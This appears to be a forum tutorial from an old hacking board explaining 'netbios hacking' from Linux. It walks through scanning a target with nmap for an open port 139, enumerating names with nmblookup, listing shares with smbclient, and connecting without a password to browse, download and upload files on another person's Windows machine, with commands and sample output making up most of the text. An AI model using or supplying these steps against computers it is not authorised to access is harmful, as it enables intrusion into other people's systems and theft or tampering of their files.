netbios hacking with samba
hope you enjoyed my last tut on netbios hacking from windows now i thought linux users will be winging cause they cant be elite_ha><oars as well so here it is netbios hacking for linux
the first step is to get samba an open source windows file sharing thing its avalible for download at
http://www.samba.org install it read the docs etc etc
now as in windows you need to make sure the computer has netbios running so we use nmap im sure most of you have and know how to use nmap but just in case get it and read the docs at
http://www.insecure.org/nmap/
Code:
[rioter@7337 rioter]$ nmap xxx.xxx.xxx.xxx
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.0.44):
(The 1541 ports scanned but not shown below are in state: closed)
Port State Service
139/tcp open netbios-ssn
Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
thats the reults of my win98 box as you can see netbios is wide open now we need to check what computers on the networks we can connect to
so we use
nmblookup -A ipaddress
Code:
[rioter@7337 rioter]$ nmblookup -A xxx.xxx.xxx.xxx
Looking up status of 192.168.0.44
computername <00> - B <ACTIVE>
workgroup <00> - <GROUP> B <ACTIVE>
computername <03> - B <ACTIVE>
computername <20> - B <ACTIVE>
workgroup <1e> - <GROUP> B <ACTIVE>
userloged in <03> - B <ACTIVE>
<20> is the fileserver and its active <03> is the user who is logged in at the time and you can sometimes connect to those computers
now to check what drives the computer your interested in has on it we use smbclient -Lcomputername -I ipaddress
it will ask for a password if its a non win 2k machine or it passsword protected you should just be able to hit enter and should let you through like it did on my computer
Code:
[rioter@7337 rioter]$ smbclient -Lcomputername
added interface ip=xxxxxxxx bcast=192.168.0.255 nmask=255.255.255.0
added interface ip=192.168.127.1 bcast=192.168.127.255 nmask=255.255.255.0
added interface ip=192.168.186.1 bcast=192.168.186.255 nmask=255.255.255.0
Got a positive name query response from xxxxxxx ( xxxxxxxx )
Password:
Sharename Type Comment
--------- ---- -------
I Disk
J Disk
G Disk
H Disk
F Disk
D Disk
E Disk
C Disk
EPSON Printer
IPC$ IPC Remote Inter Process Communication
Server Comment
--------- -------
xxxxxxx
xxxxxxx xxxx
Workgroup Master
--------- -------
xxx xxxxxxxxx
ok now your ready to connect to your computer we use smbclient again
smbclient //computername/driveletter -I ipaddress -N
Code:
[jared@7337 jared]$ smbclient //xxxxxxx/C -I xxxxxxxx -N
added interface ip=xxxxxxxx bcast=192.168.0.255 nmask=255.255.255.0
added interface ip=192.168.127.1 bcast=192.168.127.255 nmask=255.255.255.0
added interface ip=192.168.186.1 bcast=192.168.186.255 nmask=255.255.255.0
smb: \>
if your screen now looks like that you can browse their computer use normal dos commands ie dir etc etc
and also some ftp commands work but the ones you will probably use the most are get and put so get filname.exe will d/l the file for you to the current dir you are in
to exit just type exit
thats it easy aint it
to get other commands avalible to you on the programs we used just do a man program name
RiOtEr
well i have to thank negative for the formatting on the last one but also being a bitch today
and this isnt a desperate bid to get antipoints as jp said we take take take take
so i thought i would give give give